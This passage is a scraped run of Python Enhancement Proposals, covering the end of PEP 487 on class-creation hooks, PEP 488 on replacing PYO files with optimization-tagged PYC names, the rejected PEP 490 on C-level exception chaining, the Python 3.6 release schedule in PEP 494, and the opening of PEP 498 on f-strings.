the __set_name__ hooks on the descriptor after the new class has been
initialized. Then it calls __init_subclass__ on the base class, on
super(), to be precise. This means that subclass initializers already
see the fully initialized descriptors. This way, __init_subclass__ users
can fix all descriptors again if this is needed.
Another option would have been to call __set_name__ in the base
implementation of object.__init_subclass__. This way it would be possible
even to prevent __set_name__ from being called. Most of the times,
however, such a prevention would be accidental, as it often happens that a call
to super() is forgotten.
As a third option, all the work could have been done in type.__init__.
Most metaclasses do their work in __new__, as this is recommended by
the documentation. Many metaclasses modify their arguments before they
pass them over to super().__new__. For compatibility with those kind
of classes, the hooks should be called from __new__.
Another small change should be done: in the current implementation of
CPython, type.__init__ explicitly forbids the use of keyword arguments,
while type.__new__ allows for its attributes to be shipped as keyword
arguments. This is weirdly incoherent, and thus it should be forbidden.
While it would be possible to retain the current behavior, it would be better
if this was fixed, as it is probably not used at all: the only use case would
be that at metaclass calls its super().__new__ with name, bases and
dict (yes, dict, not namespace or ns as mostly used with modern
metaclasses) as keyword arguments. This should not be done. This little
change simplifies the implementation of this PEP significantly, while
improving the coherence of Python overall.
As a second change, the new type.__init__ just ignores keyword
arguments. Currently, it insists that no keyword arguments are given. This
leads to a (wanted) error if one gives keyword arguments to a class declaration
if the metaclass does not process them. Metaclass authors that do want to
accept keyword arguments must filter them out by overriding __init__.
In the new code, it is not __init__ that complains about keyword arguments,
but __init_subclass__, whose default implementation takes no arguments. In
a classical inheritance scheme using the method resolution order, each
__init_subclass__ may take out it’s keyword arguments until none are left,
which is checked by the default implementation of __init_subclass__.
For readers who prefer reading Python over English, this PEP proposes to
replace the current type and object with the following:
class NewType(type):
def __new__(cls, *args, **kwargs):
if len(args) != 3:
return super().__new__(cls, *args)
name, bases, ns = args
init = ns.get('__init_subclass__')
if isinstance(init, types.FunctionType):
ns['__init_subclass__'] = classmethod(init)
self = super().__new__(cls, name, bases, ns)
for k, v in self.__dict__.items():
func = getattr(v, '__set_name__', None)
if func is not None:
func(self, k)
super(self, self).__init_subclass__(**kwargs)
return self
def __init__(self, name, bases, ns, **kwargs):
super().__init__(name, bases, ns)
class NewObject(object):
@classmethod
def __init_subclass__(cls):
pass
Reference Implementation
The reference implementation for this PEP is attached to
issue 27366.
Backward compatibility issues
The exact calling sequence in type.__new__ is slightly changed, raising
fears of backwards compatibility. It should be assured by tests that common use
cases behave as desired.
The following class definitions (except the one defining the metaclass)
continue to fail with a TypeError as superfluous class arguments are passed:
class MyMeta(type):
pass
class MyClass(metaclass=MyMeta, otherarg=1):
pass
MyMeta("MyClass", (), otherargs=1)
import types
types.new_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
types.prepare_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
A metaclass defining only a __new__ method which is interested in keyword
arguments now does not need to define an __init__ method anymore, as the
default type.__init__ ignores keyword arguments. This is nicely in line
with the recommendation to override __new__ in metaclasses instead of
__init__. The following code does not fail anymore:
class MyMeta(type):
def __new__(cls, name, bases, namespace, otherarg):
return super().__new__(cls, name, bases, namespace)
class MyClass(metaclass=MyMeta, otherarg=1):
pass
Only defining an __init__ method in a metaclass continues to fail with
TypeError if keyword arguments are given:
class MyMeta(type):
def __init__(self, name, bases, namespace, otherarg):
super().__init__(name, bases, namespace)
class MyClass(metaclass=MyMeta, otherarg=1):
pass
Defining both __init__ and __new__ continues to work fine.
About the only thing that stops working is passing the arguments of
type.__new__ as keyword arguments:
class MyMeta(type):
def __new__(cls, name, bases, namespace):
return super().__new__(cls, name=name, bases=bases,
dict=namespace)
class MyClass(metaclass=MyMeta):
pass
This will now raise TypeError, but this is weird code, and easy
to fix even if someone used this feature.
Rejected Design Options
Calling the hook on the class itself
Adding an __autodecorate__ hook that would be called on the class
itself was the proposed idea of PEP 422. Most examples work the same
way or even better if the hook is called only on strict subclasses. In general,
it is much easier to arrange to explicitly call the hook on the class in which it
is defined (to opt-in to such a behavior) than to opt-out (by remember to check for
cls is __class in the hook body), meaning that one does not want the hook to be
called on the class it is defined in.
This becomes most evident if the class in question is designed as a
mixin: it is very unlikely that the code of the mixin is to be
executed for the mixin class itself, as it is not supposed to be a
complete class on its own.
The original proposal also made major changes in the class
initialization process, rendering it impossible to back-port the
proposal to older Python versions.
When it’s desired to also call the hook on the base class, two mechanisms are available:
Introduce an additional mixin class just to hold the __init_subclass__
implementation. The original “base” class can then list the new mixin as its
first parent class.
Implement the desired behaviour as an independent class decorator, and apply that
decorator explicitly to the base class, and then implicitly to subclasses via
__init_subclass__.
Calling __init_subclass__ explicitly from a class decorator will generally be
undesirable, as this will also typically call __init_subclass__ a second time on
the parent class, which is unlikely to be desired behaviour.
Other variants of calling the hooks
Other names for the hook were presented, namely __decorate__ or
__autodecorate__. This proposal opts for __init_subclass__ as
it is very close to the __init__ method, just for the subclass,
while it is not very close to decorators, as it does not return the
class.
For the __set_name__ hook other names have been proposed as well,
__set_owner__, __set_ownership__ and __init_descriptor__.
Requiring an explicit decorator on __init_subclass__
One could require the explicit use of @classmethod on the
__init_subclass__ decorator. It was made implicit since there’s no
sensible interpretation for leaving it out, and that case would need
to be detected anyway in order to give a useful error message.
This decision was reinforced after noticing that the user experience of
defining __prepare__ and forgetting the @classmethod method
decorator is singularly incomprehensible (particularly since PEP 3115
documents it as an ordinary method, and the current documentation doesn’t
explicitly say anything one way or the other).
A more __new__-like hook
In PEP 422 the hook worked more like the __new__ method than the
__init__ method, meaning that it returned a class instead of
modifying one. This allows a bit more flexibility, but at the cost
of much harder implementation and undesired side effects.
Adding a class attribute with the attribute order
This got its own PEP 520.
History
This used to be a competing proposal to PEP 422 by Alyssa Coghlan and Daniel
Urban. PEP 422 intended to achieve the same goals as this PEP, but with a
different way of implementation. In the meantime, PEP 422 has been withdrawn
favouring this approach.
Copyright
This document has been placed in the public domain.
| Final | PEP 487 – Simpler customisation of class creation | Standards Track | Currently, customising class creation requires the use of a custom metaclass.
This custom metaclass then persists for the entire lifecycle of the class,
creating the potential for spurious metaclass conflicts. |
PEP 488 – Elimination of PYO files
Author:
Brett Cannon <brett at python.org>
Status:
Final
Type:
Standards Track
Created:
20-Feb-2015
Python-Version:
3.5
Post-History:
06-Mar-2015,
13-Mar-2015,
20-Mar-2015
Table of Contents
Abstract
Rationale
Proposal
Implementation
importlib
Rest of the standard library
Compatibility Considerations
Rejected Ideas
Completely dropping optimization levels from CPython
Alternative formatting of the optimization level in the file name
Embedding the optimization level in the bytecode metadata
References
Copyright
Abstract
This PEP proposes eliminating the concept of PYO files from Python.
To continue the support of the separation of bytecode files based on
their optimization level, this PEP proposes extending the PYC file
name to include the optimization level in the bytecode repository
directory when there are optimizations applied.
Rationale
As of today, bytecode files come in two flavours: PYC and PYO. A PYC
file is the bytecode file generated and read from when no
optimization level is specified at interpreter startup (i.e., -O
is not specified). A PYO file represents the bytecode file that is
read/written when any optimization level is specified (i.e., when
-O or -OO is specified). This means that while PYC
files clearly delineate the optimization level used when they were
generated – namely no optimizations beyond the peepholer – the same
is not true for PYO files. To put this in terms of optimization
levels and the file extension:
0: .pyc
1 (-O): .pyo
2 (-OO): .pyo
The reuse of the .pyo file extension for both level 1 and 2
optimizations means that there is no clear way to tell what
optimization level was used to generate the bytecode file. In terms
of reading PYO files, this can lead to an interpreter using a mixture
of optimization levels with its code if the user was not careful to
make sure all PYO files were generated using the same optimization
level (typically done by blindly deleting all PYO files and then
using the compileall module to compile all-new PYO files [1]).
This issue is only compounded when people optimize Python code beyond
what the interpreter natively supports, e.g., using the astoptimizer
project [2].
In terms of writing PYO files, the need to delete all PYO files
every time one either changes the optimization level they want to use
or are unsure of what optimization was used the last time PYO files
were generated leads to unnecessary file churn. The change proposed
by this PEP also allows for all optimization levels to be
pre-compiled for bytecode files ahead of time, something that is
currently impossible thanks to the reuse of the .pyo file
extension for multiple optimization levels.
As for distributing bytecode-only modules, having to distribute both
.pyc and .pyo files is unnecessary for the common use-case
of code obfuscation and smaller file deployments. This means that
bytecode-only modules will only load from their non-optimized
.pyc file name.
Proposal
To eliminate the ambiguity that PYO files present, this PEP proposes
eliminating the concept of PYO files and their accompanying .pyo
file extension. To allow for the optimization level to be unambiguous
as well as to avoid having to regenerate optimized bytecode files
needlessly in the __pycache__ directory, the optimization level
used to generate the bytecode file will be incorporated into the
bytecode file name. When no optimization level is specified, the
pre-PEP .pyc file name will be used (i.e., no optimization level
will be specified in the file name). For example, a source file named
foo.py in CPython 3.5 could have the following bytecode files
based on the interpreter’s optimization level (none, -O, and
-OO):
0: foo.cpython-35.pyc (i.e., no change)
1: foo.cpython-35.opt-1.pyc
2: foo.cpython-35.opt-2.pyc
Currently bytecode file names are created by
importlib.util.cache_from_source(), approximately using the
following expression defined by PEP 3147 [3], [4]:
'{name}.{cache_tag}.pyc'.format(name=module_name,
cache_tag=sys.implementation.cache_tag)
This PEP proposes to change the expression when an optimization
level is specified to:
'{name}.{cache_tag}.opt-{optimization}.pyc'.format(
name=module_name,
cache_tag=sys.implementation.cache_tag,
optimization=str(sys.flags.optimize))
The “opt-” prefix was chosen so as to provide a visual separator
from the cache tag. The placement of the optimization level after
the cache tag was chosen to preserve lexicographic sort order of
bytecode file names based on module name and cache tag which will
not vary for a single interpreter. The “opt-” prefix was chosen over
“o” so as to be somewhat self-documenting. The “opt-” prefix was
chosen over “O” so as to not have any confusion in case “0” was the
leading prefix of the optimization level.
A period was chosen over a hyphen as a separator so as to distinguish
clearly that the optimization level is not part of the interpreter
version as specified by the cache tag. It also lends to the use of
the period in the file name to delineate semantically different
concepts.
For example, if -OO had been passed to the interpreter then
instead of importlib.cpython-35.pyo the file name would be
importlib.cpython-35.opt-2.pyc.
Leaving out the new opt- tag when no optimization level is
applied should increase backwards-compatibility. This is also more
understanding of Python implementations which have no use for
optimization levels (e.g., PyPy [10]).
It should be noted that this change in no way affects the performance
of import. Since the import system looks for a single bytecode file
based on the optimization level of the interpreter already and
generates a new bytecode file if it doesn’t exist, the introduction
of potentially more bytecode files in the __pycache__ directory
has no effect in terms of stat calls. The interpreter will continue
to look for only a single bytecode file based on the optimization
level and thus no increase in stat calls will occur.
The only potentially negative result of this PEP is the probable
increase in the number of .pyc files and thus increase in storage
use. But for platforms where this is an issue,
sys.dont_write_bytecode exists to turn off bytecode generation so
that it can be controlled offline.
Implementation
An implementation of this PEP is available [11].
importlib
As importlib.util.cache_from_source() is the API that exposes
bytecode file paths as well as being directly used by importlib, it
requires the most critical change. As of Python 3.4, the function’s
signature is:
importlib.util.cache_from_source(path, debug_override=None)
This PEP proposes changing the signature in Python 3.5 to:
importlib.util.cache_from_source(path, debug_override=None, *, optimization=None)
The introduced optimization keyword-only parameter will control
what optimization level is specified in the file name. If the
argument is None then the current optimization level of the
interpreter will be assumed (including no optimization). Any argument
given for optimization will be passed to str() and must have
str.isalnum() be true, else ValueError will be raised (this
prevents invalid characters being used in the file name). If the
empty string is passed in for optimization then the addition of
the optimization will be suppressed, reverting to the file name
format which predates this PEP.
It is expected that beyond Python’s own two optimization levels,
third-party code will use a hash of optimization names to specify the
optimization level, e.g.
hashlib.sha256(','.join(['no dead code', 'const folding'])).hexdigest().
While this might lead to long file names, it is assumed that most
users never look at the contents of the __pycache__ directory and so
this won’t be an issue.
The debug_override parameter will be deprecated. A False
value will be equivalent to optimization=1 while a True
value will represent optimization='' (a None argument will
continue to mean the same as for optimization). A
deprecation warning will be raised when debug_override is given a
value other than None, but there are no plans for the complete
removal of the parameter at this time (but removal will be no later
than Python 4).
The various module attributes for importlib.machinery which relate to
bytecode file suffixes will be updated [7]. The
DEBUG_BYTECODE_SUFFIXES and OPTIMIZED_BYTECODE_SUFFIXES will
both be documented as deprecated and set to the same value as
BYTECODE_SUFFIXES (removal of DEBUG_BYTECODE_SUFFIXES and
OPTIMIZED_BYTECODE_SUFFIXES is not currently planned, but will be
not later than Python 4).
All various finders and loaders will also be updated as necessary,
but updating the previous mentioned parts of importlib should be all
that is required.
Rest of the standard library
The various functions exposed by the py_compile and
compileall functions will be updated as necessary to make sure
they follow the new bytecode file name semantics [6], [1]. The CLI
for the compileall module will not be directly affected (the
-b flag will be implicit as it will no longer generate .pyo
files when -O is specified).
Compatibility Considerations
Any code directly manipulating bytecode files from Python 3.2 on
will need to consider the impact of this change on their code (prior
to Python 3.2 – including all of Python 2 – there was no
__pycache__ which already necessitates bifurcating bytecode file
handling support). If code was setting the debug_override
argument to importlib.util.cache_from_source() then care will be
needed if they want the path to a bytecode file with an optimization
level of 2. Otherwise only code not using
importlib.util.cache_from_source() will need updating.
As for people who distribute bytecode-only modules (i.e., use a
bytecode file instead of a source file), they will have to choose
which optimization level they want their bytecode files to be since
distributing a .pyo file with a .pyc file will no longer be
of any use. Since people typically only distribute bytecode files for
code obfuscation purposes or smaller distribution size then only
having to distribute a single .pyc should actually be beneficial
to these use-cases. And since the magic number for bytecode files
changed in Python 3.5 to support PEP 465 there is no need to support
pre-existing .pyo files [8].
Rejected Ideas
Completely dropping optimization levels from CPython
Some have suggested that instead of accommodating the various
optimization levels in CPython, we should instead drop them
entirely. The argument is that significant performance gains would
occur from runtime optimizations through something like a JIT and not
through pre-execution bytecode optimizations.
This idea is rejected for this PEP as that ignores the fact that
there are people who do find the pre-existing optimization levels for
CPython useful. It also assumes that no other Python interpreter
would find what this PEP proposes useful.
Alternative formatting of the optimization level in the file name
Using the “opt-” prefix and placing the optimization level between
the cache tag and file extension is not critical. All options which
have been considered are:
importlib.cpython-35.opt-1.pyc
importlib.cpython-35.opt1.pyc
importlib.cpython-35.o1.pyc
importlib.cpython-35.O1.pyc
importlib.cpython-35.1.pyc
importlib.cpython-35-O1.pyc
importlib.O1.cpython-35.pyc
importlib.o1.cpython-35.pyc
importlib.1.cpython-35.pyc
These were initially rejected either because they would change the
sort order of bytecode files, possible ambiguity with the cache tag,
or were not self-documenting enough. An informal poll was taken and
people clearly preferred the formatting proposed by the PEP [9].
Since this topic is non-technical and of personal choice, the issue
is considered solved.
Embedding the optimization level in the bytecode metadata
Some have suggested that rather than embedding the optimization level
of bytecode in the file name that it be included in the file’s
metadata instead. This would mean every interpreter had a single copy
of bytecode at any time. Changing the optimization level would thus
require rewriting the bytecode, but there would also only be a single
file to care about.
This has been rejected due to the fact that Python is often installed
as a root-level application and thus modifying the bytecode file for
modules in the standard library are always possible. In this
situation integrators would need to guess at what a reasonable
optimization level was for users for any/all situations. By
allowing multiple optimization levels to co-exist simultaneously it
frees integrators from having to guess what users want and allows
users to utilize the optimization level they want.
References
[1] (1, 2)
The compileall module
(https://docs.python.org/3.5/library/compileall.html)
[2]
The astoptimizer project
(https://web.archive.org/web/20150909225454/https://pypi.python.org/pypi/astoptimizer)
[3]
importlib.util.cache_from_source()
(https://docs.python.org/3.5/library/importlib.html#importlib.util.cache_from_source)
[4]
Implementation of importlib.util.cache_from_source() from CPython 3.4.3rc1
(https://github.com/python/cpython/blob/e55181f517bbfc875065ce86ed3e05cf0e0246fa/Lib/importlib/_bootstrap.py#L437)
[6]
The py_compile module
(https://docs.python.org/3.5/library/compileall.html)
[7]
The importlib.machinery module
(https://docs.python.org/3.5/library/importlib.html#module-importlib.machinery)
[8]
importlib.util.MAGIC_NUMBER
(https://docs.python.org/3.5/library/importlib.html#importlib.util.MAGIC_NUMBER)
[9]
Informal poll of file name format options on Google+
(https://web.archive.org/web/20160925163500/https://plus.google.com/+BrettCannon/posts/fZynLNwHWGm)
[10]
The PyPy Project
(https://www.pypy.org/)
[11]
Implementation of PEP 488
(https://github.com/python/cpython/issues/67919)
Copyright
This document has been placed in the public domain.
| Final | PEP 488 – Elimination of PYO files | Standards Track | This PEP proposes eliminating the concept of PYO files from Python.
To continue the support of the separation of bytecode files based on
their optimization level, this PEP proposes extending the PYC file
name to include the optimization level in the bytecode repository
directory when there are optimizations applied. |
PEP 490 – Chain exceptions at C level
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
25-Mar-2015
Python-Version:
3.6
Table of Contents
Abstract
Rationale
Proposal
Modify PyErr_*() functions to chain exceptions
Modify functions to not chain exceptions
Modify functions to chain exceptions
Backward compatibility
Alternatives
No change
New helpers to chain exceptions
Appendix
PEPs
Python C API
Python Issues
Rejection
Copyright
Abstract
Chain exceptions at C level, as already done at Python level.
Rationale
Python 3 introduced a new killer feature: exceptions are chained by
default, PEP 3134.
Example:
try:
raise TypeError("err1")
except TypeError:
raise ValueError("err2")
Output:
Traceback (most recent call last):
File "test.py", line 2, in <module>
raise TypeError("err1")
TypeError: err1
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "test.py", line 4, in <module>
raise ValueError("err2")
ValueError: err2
Exceptions are chained by default in Python code, but not in
extensions written in C.
A new private _PyErr_ChainExceptions() function was introduced in
Python 3.4.3 and 3.5 to chain exceptions. Currently, it must be called
explicitly to chain exceptions and its usage is not trivial.
Example of _PyErr_ChainExceptions() usage from the zipimport
module to chain the previous OSError to a new ZipImportError
exception:
PyObject *exc, *val, *tb;
PyErr_Fetch(&exc, &val, &tb);
PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
_PyErr_ChainExceptions(exc, val, tb);
This PEP proposes to also chain exceptions automatically at C level to
stay consistent and give more information on failures to help
debugging. The previous example becomes simply:
PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
Proposal
Modify PyErr_*() functions to chain exceptions
Modify C functions raising exceptions of the Python C API to
automatically chain exceptions: modify PyErr_SetString(),
PyErr_Format(), PyErr_SetNone(), etc.
Modify functions to not chain exceptions
Keeping the previous exception is not always interesting when the new
exception contains information of the previous exception or even more
information, especially when the two exceptions have the same type.
Example of an useless exception chain with int(str):
TypeError: a bytes-like object is required, not 'type'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: int() argument must be a string, a bytes-like object or a number, not 'type'
The new TypeError exception contains more information than the
previous exception. The previous exception should be hidden.
The PyErr_Clear() function can be called to clear the current
exception before raising a new exception, to not chain the current
exception with a new exception.
Modify functions to chain exceptions
Some functions save and then restore the current exception. If a new
exception is raised, the exception is currently displayed into
sys.stderr or ignored depending on the function. Some of these
functions should be modified to chain exceptions instead.
Examples of function ignoring the new exception(s):
ptrace_enter_call(): ignore exception
subprocess_fork_exec(): ignore exception raised by enable_gc()
t_bootstrap() of the _thread module: ignore exception raised
by trying to display the bootstrap function to sys.stderr
PyDict_GetItem(), _PyDict_GetItem_KnownHash(): ignore
exception raised by looking for a key in the dictionary
_PyErr_TrySetFromCause(): ignore exception
PyFrame_LocalsToFast(): ignore exception raised by
dict_to_map()
_PyObject_Dump(): ignore exception. _PyObject_Dump() is used
to debug, to inspect a running process, it should not modify the
Python state.
Py_ReprLeave(): ignore exception “because there is no way to
report them”
type_dealloc(): ignore exception raised by
remove_all_subclasses()
PyObject_ClearWeakRefs(): ignore exception?
call_exc_trace(), call_trace_protected(): ignore exception
remove_importlib_frames(): ignore exception
do_mktuple(), helper used by Py_BuildValue() for example:
ignore exception?
flush_io(): ignore exception
sys_write(), sys_format(): ignore exception
_PyTraceback_Add(): ignore exception
PyTraceBack_Print(): ignore exception
Examples of function displaying the new exception to sys.stderr:
atexit_callfuncs(): display exceptions with
PyErr_Display() and return the latest exception, the function
calls multiple callbacks and only returns the latest exception
sock_dealloc(): log the ResourceWarning exception with
PyErr_WriteUnraisable()
slot_tp_del(): display exception with
PyErr_WriteUnraisable()
_PyGen_Finalize(): display gen_close() exception with
PyErr_WriteUnraisable()
slot_tp_finalize(): display exception raised by the
__del__() method with PyErr_WriteUnraisable()
PyErr_GivenExceptionMatches(): display exception raised by
PyType_IsSubtype() with PyErr_WriteUnraisable()
Backward compatibility
A side effect of chaining exceptions is that exceptions store
traceback objects which store frame objects which store local
variables. Local variables are kept alive by exceptions. A common
issue is a reference cycle between local variables and exceptions: an
exception is stored in a local variable and the frame indirectly
stored in the exception. The cycle only impacts applications storing
exceptions.
The reference cycle can now be fixed with the new
traceback.TracebackException object introduced in Python 3.5. It
stores information required to format a full textual traceback without
storing local variables.
The asyncio is impacted by the reference cycle issue. This module
is also maintained outside Python standard library to release a
version for Python 3.3. traceback.TracebackException will maybe
be backported in a private asyncio module to fix reference cycle
issues.
Alternatives
No change
A new private _PyErr_ChainExceptions() function is enough to chain
manually exceptions.
Exceptions will only be chained explicitly where it makes sense.
New helpers to chain exceptions
Functions like PyErr_SetString() don’t chain automatically
exceptions. To make the usage of _PyErr_ChainExceptions() easier,
new private functions are added:
_PyErr_SetStringChain(exc_type, message)
_PyErr_FormatChain(exc_type, format, ...)
_PyErr_SetNoneChain(exc_type)
_PyErr_SetObjectChain(exc_type, exc_value)
Helper functions to raise specific exceptions like
_PyErr_SetKeyError(key) or PyErr_SetImportError(message, name,
path) don’t chain exceptions. The generic
_PyErr_ChainExceptions(exc_type, exc_value, exc_tb) should be used
to chain exceptions with these helper functions.
Appendix
PEPs
PEP 3134 – Exception Chaining and Embedded Tracebacks
(Python 3.0):
new __context__ and __cause__ attributes for exceptions
PEP 415 – Implement context suppression with exception attributes
(Python 3.3):
raise exc from None
PEP 409 – Suppressing exception context
(superseded by the PEP 415)
Python C API
The header file Include/pyerror.h declares functions related to
exceptions.
Functions raising exceptions:
PyErr_SetNone(exc_type)
PyErr_SetObject(exc_type, exc_value)
PyErr_SetString(exc_type, message)
PyErr_Format(exc, format, ...)
Helpers to raise specific exceptions:
PyErr_BadArgument()
PyErr_BadInternalCall()
PyErr_NoMemory()
PyErr_SetFromErrno(exc)
PyErr_SetFromWindowsErr(err)
PyErr_SetImportError(message, name, path)
_PyErr_SetKeyError(key)
_PyErr_TrySetFromCause(prefix_format, ...)
Manage the current exception:
PyErr_Clear(): clear the current exception,
like except: pass
PyErr_Fetch(exc_type, exc_value, exc_tb)
PyErr_Restore(exc_type, exc_value, exc_tb)
PyErr_GetExcInfo(exc_type, exc_value, exc_tb)
PyErr_SetExcInfo(exc_type, exc_value, exc_tb)
Others function to handle exceptions:
PyErr_ExceptionMatches(exc): check to implement
except exc: ...
PyErr_GivenExceptionMatches(exc1, exc2)
PyErr_NormalizeException(exc_type, exc_value, exc_tb)
_PyErr_ChainExceptions(exc_type, exc_value, exc_tb)
Python Issues
Chain exceptions:
Issue #23763: Chain exceptions in C
Issue #23696: zipimport: chain ImportError to OSError
Issue #21715: Chaining exceptions at C level: added
_PyErr_ChainExceptions()
Issue #18488: sqlite: finalize() method of user function may be
called with an exception set if a call to step() method failed
Issue #23781: Add private _PyErr_ReplaceException() in 2.7
Issue #23782: Leak in _PyTraceback_Add
Changes preventing to loose exceptions:
Issue #23571: Raise SystemError if a function returns a result with an
exception set
Issue #18408: Fixes crashes found by pyfailmalloc
Rejection
The PEP was rejected on 2017-09-12 by Victor Stinner. It was decided in
the python-dev discussion to not chain C exceptions by default, but
instead chain them explicitly only where it makes sense.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 490 – Chain exceptions at C level | Standards Track | Chain exceptions at C level, as already done at Python level. |
PEP 494 – Python 3.6 Release Schedule
Author:
Ned Deily <nad at python.org>
Status:
Final
Type:
Informational
Topic:
Release
Created:
30-May-2015
Python-Version:
3.6
Table of Contents
Abstract
Release Manager and Crew
3.6 Lifespan
Release Schedule
3.6.0 schedule
3.6.1 schedule (first bugfix release)
3.6.2 schedule
3.6.3 schedule
3.6.4 schedule
3.6.5 schedule
3.6.6 schedule
3.6.7 schedule
3.6.8 schedule (last bugfix release)
3.6.9 schedule (first security-only release)
3.6.10 schedule
3.6.11 schedule
3.6.12 schedule
3.6.13 schedule
3.6.14 schedule
3.6.15 schedule (last security-only release)
Features for 3.6
Copyright
Abstract
This document describes the development and release schedule for
Python 3.6. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.6 Release Manager: Ned Deily
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard, Georg Brandl
3.6 Lifespan
3.6 will receive bugfix updates
approximately every 3 months for about 24 months. Sometime after the release of
3.7.0 final, a final 3.6 bugfix update will be released.
After that, it is expected that
security updates
(source only) will be released as needed until 5 years after
the release of 3.6 final, so until approximately 2021-12.
As of 2021-12-23, 3.6 has reached the
end-of-life phase
of its release cycle. 3.6.15 was the final security release. The code base for
3.6 is now frozen and no further updates will be provided nor issues of any
kind will be accepted on the bug tracker.
Release Schedule
3.6.0 schedule
3.6 development begins: 2015-05-24
3.6.0 alpha 1: 2016-05-17
3.6.0 alpha 2: 2016-06-13
3.6.0 alpha 3: 2016-07-11
3.6.0 alpha 4: 2016-08-15
3.6.0 beta 1: 2016-09-12
(No new features beyond this point.)
3.6.0 beta 2: 2016-10-10
3.6.0 beta 3: 2016-10-31
3.6.0 beta 4: 2016-11-21
3.6.0 candidate 1: 2016-12-06
3.6.0 candidate 2: 2016-12-16
3.6.0 final: 2016-12-23
3.6.1 schedule (first bugfix release)
3.6.1 candidate: 2017-03-05
3.6.1 final: 2017-03-21
3.6.2 schedule
3.6.2 candidate 1: 2017-06-17
3.6.2 candidate 2: 2017-07-07
3.6.2 final: 2017-07-17
3.6.3 schedule
3.6.3 candidate: 2017-09-19
3.6.3 final: 2017-10-03
3.6.4 schedule
3.6.4 candidate: 2017-12-05
3.6.4 final: 2017-12-19
3.6.5 schedule
3.6.5 candidate: 2018-03-13
3.6.5 final: 2018-03-28
3.6.6 schedule
3.6.6 candidate: 2018-06-12
3.6.6 final: 2018-06-27
3.6.7 schedule
3.6.7 candidate: 2018-09-26
3.6.7 candidate 2: 2018-10-13
3.6.7 final: 2018-10-20
3.6.8 schedule (last bugfix release)
Last binary releases
3.6.8 candidate: 2018-12-11
3.6.8 final: 2018-12-24
3.6.9 schedule (first security-only release)
Source only
3.6.9 candidate 1: 2019-06-18
3.6.9 final: 2019-07-02
3.6.10 schedule
3.6.10 candidate 1: 2019-12-11
3.6.10 final: 2019-12-18
3.6.11 schedule
3.6.11 candidate 1: 2020-06-15
3.6.11 final: 2020-06-27
3.6.12 schedule
3.6.12 final: 2020-08-17
3.6.13 schedule
3.6.13 final: 2021-02-15
3.6.14 schedule
3.6.14 final: 2021-06-28
3.6.15 schedule (last security-only release)
3.6.15 final: 2021-09-04
Features for 3.6
Implemented changes for 3.6 (as of 3.6.0 beta 1):
PEP 468, Preserving Keyword Argument Order
PEP 487, Simpler customization of class creation
PEP 495, Local Time Disambiguation
PEP 498, Literal String Formatting
PEP 506, Adding A Secrets Module To The Standard Library
PEP 509, Add a private version to dict
PEP 515, Underscores in Numeric Literals
PEP 519, Adding a file system path protocol
PEP 520, Preserving Class Attribute Definition Order
PEP 523, Adding a frame evaluation API to CPython
PEP 524, Make os.urandom() blocking on Linux (during system startup)
PEP 525, Asynchronous Generators (provisional)
PEP 526, Syntax for Variable Annotations (provisional)
PEP 528, Change Windows console encoding to UTF-8 (provisional)
PEP 529, Change Windows filesystem encoding to UTF-8 (provisional)
PEP 530, Asynchronous Comprehensions
Copyright
This document has been placed in the public domain.
| Final | PEP 494 – Python 3.6 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.6. The schedule primarily concerns itself with PEP-sized
items. |
PEP 498 – Literal String Interpolation
Author:
Eric V. Smith <eric at trueblade.com>
Status:
Final
Type:
Standards Track
Created:
01-Aug-2015
Python-Version:
3.6
Post-History:
07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
No use of globals() or locals()
Specification
Escape sequences
Code equivalence
Expression evaluation
Format specifiers
Concatenating strings
Error handling
Leading and trailing whitespace in expressions is ignored
Evaluation order of expressions
Discussion
python-ideas discussion
How to denote f-strings
How to specify the location of expressions in f-strings
Supporting full Python expressions
Similar support in other languages
Differences between f-string and str.format expressions
Triple-quoted f-strings
Raw f-strings
No binary f-strings
!s, !r, and !a are redundant
Lambdas inside expressions
Can’t combine with ‘u’
Examples from Python’s source code
References
Copyright
Abstract
Python supports multiple ways to format text strings. These include
%-formatting [1], str.format() [2], and string.Template
[3]. Each of these methods have their advantages, but in addition
have disadvantages that make them cumbersome to use in practice. This
PEP proposed to add a new string formatting mechanism: Literal String
Interpolation. In this PEP, such strings will be referred to as
“f-strings”, taken from the leading character used to denote such
strings, and standing for “formatted strings”.
This PEP does not propose to remove or deprecate any of the existing
string formatting mechanisms.
F-strings provide a way to embed expressions inside string literals,
using a minimal syntax. It should be noted that an f-string is really
an expression evaluated at run time, not a constant value. In Python
source code, an f-string is a literal string, prefixed with ‘f’, which
contains expressions inside braces. The expressions are replaced with
their values. Some examples are:
>>> import datetime
>>> name = 'Fred'
>>> age = 50
>>> anniversary = datetime.date(1991, 10, 12)
>>> f'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.'
'My name is Fred, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
>>> f'He said his name is {name!r}.'
"He said his name is 'Fred'."
A similar feature was proposed in PEP 215. PEP 215 proposed to support
a subset of Python expressions, and did not support the type-specific
string formatting (the __format__() method) which was introduced
with PEP 3101.
Rationale
This PEP is driven by the desire to have a simpler way to format
strings in Python. The existing ways of formatting are either error
prone, inflexible, or cumbersome.
%-formatting is limited as to the types it supports. Only ints, strs,
and doubles can be formatted. All other types are either not
supported, or converted to one of these types before formatting. In
addition, there’s a well-known trap where a single value is passed:
>>> msg = 'disk failure'
>>> 'error: %s' % msg
'error: disk failure'
But if msg were ever to be a tuple, the same code would fail:
>>> msg = ('disk failure', 32)
>>> 'error: %s' % msg
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: not all arguments converted during string formatting
To be defensive, the following code should be used:
>>> 'error: %s' % (msg,)
"error: ('disk failure', 32)"
str.format() was added to address some of these problems with
%-formatting. In particular, it uses normal function call syntax (and
therefore supports multiple parameters) and it is extensible through
